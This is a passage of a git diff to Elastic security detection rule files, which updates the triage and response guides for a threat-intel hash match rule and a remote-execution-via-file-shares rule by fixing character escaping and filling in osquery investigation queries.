a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_3.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -197,7 +197,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json index 20b9a7062bc..e534a08596f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_4.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThis rule needs threat intelligence indicators to work. Threat intelligence indicators can be collected using an [Elastic Agent integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#agent-ti-integration), the [Threat Intel module](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#ti-mod-integration), or a [custom integration](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html#custom-ti-integration).\n\nMore information can be found [here](https://www.elastic.co/guide/en/security/current/es-threat-intel-integrations.html).", "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -197,7 +197,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json index d03b8859562..c1f30281682 100644 --- a/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json +++ b/packages/security_detection_engine/kibana/security_rule/aab184d3-72b3-4639-b242-6597c99d8bca_5.json @@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -197,7 +197,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json index f04bd59f815..55d5d503027 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support 